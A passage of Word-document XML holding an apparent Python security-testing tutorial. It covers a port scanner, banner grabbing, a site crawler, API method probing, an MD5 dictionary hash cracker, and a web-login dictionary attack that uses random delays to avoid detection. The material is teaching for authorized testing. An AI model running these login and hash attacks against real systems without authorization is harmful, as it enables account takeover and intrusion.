    <w:p w14:paraId="35435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'ssh': r'SSH|OpenSSH',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AE9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'http': r'HTTP|Apache|nginx|Microsoft-IIS|lighttpd',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69655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'ftp': r'FTP|FileZilla|vsftpd|ProFTPD',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D4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'smtp': r'SMTP|Postfix|Exim',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E352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'mysql': r'MySQL',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E92A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'dns': r'DNS|Bind',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EDE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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171A8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9961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service, pattern in patterns.items():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457DE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re.search(pattern, banner_str, re.IGNORECASE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB4B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Try to extract version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B75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version_match = re.search(r'(\d+\.\d+\.?\d*)', banner_str)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C523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version_match:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1624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f"{service} ({version_match.group(1)})"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B509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service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3264A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1B7B2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Check if it looks like a common service based on port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E50C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common_ports = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C4E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22: 'SSH', 80: 'HTTP', 443: 'HTTPS', 21: 'FTP',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E39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25: 'SMTP', 110: 'POP3', 143: 'IMAP', 3306: 'MySQL',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4F1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5432: 'PostgreSQL', 3389: 'RDP', 5900: 'VNC'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C527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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C79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2FD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port in common_ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185D3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f"Possible {common_ports[port]} (no banner)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2926B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5D95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"Unknown"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323CC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1B7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344C2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fingerprint_service(ip, port):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4C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banner = grab_banner(ip, port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4B5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service = identify_service(banner, port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9C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print(f"Port {port}: {service}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD5E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banner:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E99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Display the first line of the banner or first 100 chars</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2331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banner_preview = str(banner).split('\\r\\n')[0][:100]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3200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print(f"Banner: {banner_preview}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F38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54C3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Test on localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AFE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fingerprint_service("127.0.0.1", 80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DA23FD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2: Web Scraping and API Interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F2D10A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Web Scraping for Security Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7971E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requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455A4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bs4 import BeautifulSoup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D455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urllib.parse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1EC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096C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extract_links(url):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E22B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"""Extract all links from a webpage"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF5A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31E1D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response = requests.get(url, timeout=5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF2A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soup = BeautifulSoup(response.text, 'html.parser')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0544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0F0F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links = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E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link in soup.find_all('a'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04785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href = link.get('href')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38195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href:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA76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Make relative URLs absolute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4818C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absolute_url = urllib.parse.urljoin(url, href)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094F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links.append(absolute_url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754CC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3E554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links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5D9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Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1686A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 extracting links from {url}: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1776B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[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210F8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760B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discover_website_structure(base_url, max_pages=20):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FF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"""Map a website's structure by crawling links"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187F6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discovered_urls = set()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1903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urls_to_visit = [base_url]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D99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visited_urls = set()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7DE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8A9E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print(f"Starting discovery of {base_url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1158D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730C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while urls_to_visit and len(visited_urls) &lt; max_pages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B26E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current_url = urls_to_visit.pop(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBDE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ED02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Skip if already visited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0C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current_url in visited_urls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C67E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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C18F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73513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Skip if not part of the same domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576B8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urllib.parse.urlparse(base_url).netloc != urllib.parse.urlparse(current_url).netloc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516C9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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011A5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3E0A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print(f"Visiting: {current_url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15866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visited_urls.add(current_url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DD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175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Extract links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6C9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links = extract_links(current_url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078AF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link in links:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2937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link not in visited_urls and link not in urls_to_visit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551F8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discovered_urls.add(link)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D68A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urls_to_visit.append(link)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302B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66E9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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1AB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'visited': visited_urls,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052B2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'discovered': discovered_urls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78786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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE98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694B6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775A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website_map = discover_website_structure("http://example.com", max_pages=10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C2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print(f"\nVisited {len(website_map['visited'])} pages")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4868F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print(f"Discovered {len(website_map['discovered'])} additional URLs")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D945C13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API Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1A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requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9FD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json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC6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BA68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test_api_endpoint(url, method="GET", data=None, headers=None, auth=None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42281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"""Test an API endpoint with various methods"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137BC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headers is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F6D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headers = {'Content-Type': 'application/json'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42811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1670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36BCC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method.upper() == "GET":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309CF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requests.get(url, headers=headers, auth=auth, timeout=5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6216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method.upper() == "POST":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B25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requests.post(url, json=data, headers=headers, auth=auth, timeout=5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098AA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method.upper() == "PUT":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28405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requests.put(url, json=data, headers=headers, auth=auth, timeout=5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC4D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method.upper() == "DELETE":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C554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requests.delete(url, headers=headers, auth=auth, timeout=5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205A9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7E523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{"error": f"Unsupported method: {method}"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F05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5827A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Try to parse JSON response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B9B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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD4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response_data = response.json()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5814A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except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBC2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response_data = response.text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D23F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1C65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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FF5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"status_code": response.status_code,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D47A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"headers": dict(response.headers),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C5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"response": response_data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCC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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7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Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371C5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{"error": str(e)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A98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0F713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test_api_security(base_url, endpoints=None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138B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"""Test common API security issues"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7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endpoints is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187D2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endpoints = ["/", "/api", "/v1", "/users", "/admin"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4659F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2819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results = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47940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BF08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Test each endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C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endpoint in endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40687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full_url = f"{base_url.rstrip('/')}/{endpoint.lstrip('/')}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EDD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print(f"Testing endpoint: {full_url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D02E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CF0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Test with different methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FF4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method in ["GET", "POST", "PUT", "DELETE"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7398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  Method: {method}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC62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 = test_api_endpoint(full_url, method=method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C40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C45E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Check for security issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A7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status = result.get("status_code")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3466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status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581D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status == 200 and method in ["PUT", "DELETE"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB93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  [!] Possible issue: {method} allowed without authentication")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1D9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elif status == 500:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6113A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  [!] Server error - possible injection point")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D91F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elif status == 403 or status == 401:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2868F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  [+] Properly protected against {method}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CF2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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A33D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  Status code: {status}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C60D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7E0B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results[f"{endpoint}_{method}"] = result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F78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45FB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results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42029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20B83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163BA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api_test_results = test_api_security("http://api-example-target.com")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B65720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3: Password Attacks and Authentication Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766AB710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Dictionary Attack Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345C9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requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7A9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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257F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random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA90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DFF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def dictionary_attack_simulation(login_url, username, wordlist_file, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B8F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        data_template=None, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DED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        failure_indicator="Invalid password",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4091F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        max_attempts=50,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D198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        delay_range=(1, 3)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F174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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CA1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Simulate a dictionary attack against a web login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781FC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68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Note: This is for EDUCATIONAL PURPOSES ONLY and should only be used against</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CEE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your own test systems or with explicit permission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55010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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1EF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data_template is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1FB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Default template - adjust according to the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA35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data_template = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C9A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"username": username,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E573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"password": "{password}",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A56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"submit": "Login"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57589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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4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8E2A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successful_password = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423CB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attempts = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489BA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16FA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2D883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open(wordlist_file, 'r') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F373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password in f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3631F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password = password.strip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D6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not password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC6E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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21868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3AA7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attempts += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C37B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attempts &gt; max_attempts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB2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print(f"Reached maximum attempts ({max_attempts})")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC2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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF6C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353F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Replace the password placeholder in the template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C5B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data = {k: v.replace("{password}", password) if isinstance(v, str) else v </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6A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for k, v in data_template.items()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EFC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62B6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print(f"Attempt {attempts}: Testing password '{password}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ECB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42D4F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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D3B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response = requests.post(login_url, data=data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19063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# Check if login was successful (varies by target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27872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if failure_indicator not in response.text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06360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successful_password = password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3606E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print(f"[SUCCESS] Found valid password: '{password}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D7E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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF59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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB32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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E428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print(f"Error during attempt: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAD2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Random delay to avoid detection/blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB37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delay = random.uniform(delay_range[0], delay_range[1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F5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time.sleep(delay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE0A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FA4F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FileNotFoundError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715E0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print(f"Wordlist file not found: {wordlist_file}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E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8864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Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6FE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print(f"Unexpected error: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3827A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BAC9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finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765C5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print(f"\nAttack simulation summary:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DB9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print(f"- Target: {login_url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3BA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print(f"- Username: {username}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0244B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print(f"- Attempts: {attempts}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A80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print(f"- Success: {'Yes' if successful_password else 'No'}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA12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successful_password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7019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print(f"- Valid password: '{successful_password}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA06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6EDD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successful_password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221B0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20EDD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 (DO NOT execute against real targets without permission)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5F0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dictionary_attack_simulation(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438D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#     login_url="http://localhost/login.php", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5085C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    username="admin",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EE5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    wordlist_file="common_passwords.txt",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3292B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    failure_indicator="Invalid username or password"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66953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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D28D05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Hash Cracking Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D70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hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C88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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458DF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1EB2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hash_string(text, algorithm='md5'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4C7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"""Hash a string using the specified algorithm"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A893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h = hashlib.new(algorithm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760F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h.update(text.encode('utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B69E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h.hexdigest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6076B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D0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crack_hash(target_hash, wordlist_file, algorithm='md5'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7592A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C9A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Attempt to crack a hash using a dictionary attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7888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61C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Args:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1951F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target_hash: The hash to crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB0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wordlist_file: Path to a file containing passwords to try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5460F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algorithm: Hash algorithm (md5, sha1, sha256, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEF7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7A5B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Returns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04968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The cracked password or None if not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6438D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A76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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A091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attempts = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDD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550D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6266B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open(wordlist_file, 'r', errors='ignore') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E998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password in f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CD8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password = password.strip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1D9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not password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040BB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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F427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6EEE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attempts += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CED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397F7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Hash the current password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D2E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password_hash = hash_string(password, algorithm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D35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0B68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Check if it matches the target hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3340C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password_hash.lower() == target_hash.lower():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A766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elapsed_time = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0058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print(f"\n[SUCCESS] Password found!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3887F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print(f"- Hash: {target_hash}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D4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print(f"- Original text: {password}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A0A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print(f"- Algorithm: {algorithm}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62542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print(f"- Attempts: {attempts}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AD9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print(f"- Time: {elapsed_time:.2f} seconds")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9A8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return password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0C5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7E3E1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Progress indicator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D79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attempts % 10000 == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D8A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print(f"Tried {attempts} passwords...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE0D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B7C2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FileNotFoundError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124BF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print(f"Wordlist file not found: {wordlist_file}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8D8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B8B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Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027FF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print(f"Error: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FCE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A4DB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If we get here, the password wasn't found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0261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elapsed_time = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE6E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print(f"\nPassword not found after {attempts} attempts ({elapsed_time:.2f} seconds)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0B2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None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B47C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97EB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEE6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hash_to_crack = "5f4dcc3b5aa765d61d8327deb882cf99"  # MD5 hash of "password"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7C9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cracked = crack_hash(hash_to_crack, "common_passwords.txt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07886F5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Part 4: Lab Exercises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D079945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Exercise 1: Advanced Port Scanner with Service Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60573FE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Objective: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Create a comprehensive port scanner with service detection capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35564D3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Tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77509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Implement a multi-threaded port scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402B8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Add service banner grabbing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A63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Identify service versions from banners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CAF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Generate a security report with potential vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324C543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Sample Code Framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EDF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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3397F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threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11283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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0684C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queue import Queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1133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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A921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argparse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1073A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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5702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FC9C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scan_port(ip, port, timeout=1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2382E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"""Scan a single port"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539DA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 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17795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sock.settimeout(timeout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD6B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result = sock.connect_ex((ip, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6A8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sock.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F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result == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6EC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True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4649C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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6257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CD05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grab_banner(ip, port, timeout=3):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F4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"""Attempt to grab service banner"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2F9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3864C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socket.setdefaulttimeout(timeout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49243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 = socket.socket()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06854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s.connect((ip, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66762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CE5A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Send different payloads based on common ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D08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port in [80, 443, 8080, 8443]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B86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s.send(b'GET / HTTP/1.1\r\nHost: ' + ip.encode() + b'\r\n\r\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4AC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port == 25 or port == 587:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F544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pass  # SMTP will send banner automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670E49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port == 21:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5C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pass  # FTP will send banner automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF9F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port == 22:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D8E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pass  # SSH will send banner automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38342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0BB0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banner = s.recv(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C866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s.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0039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banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175DC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except:</w:t>
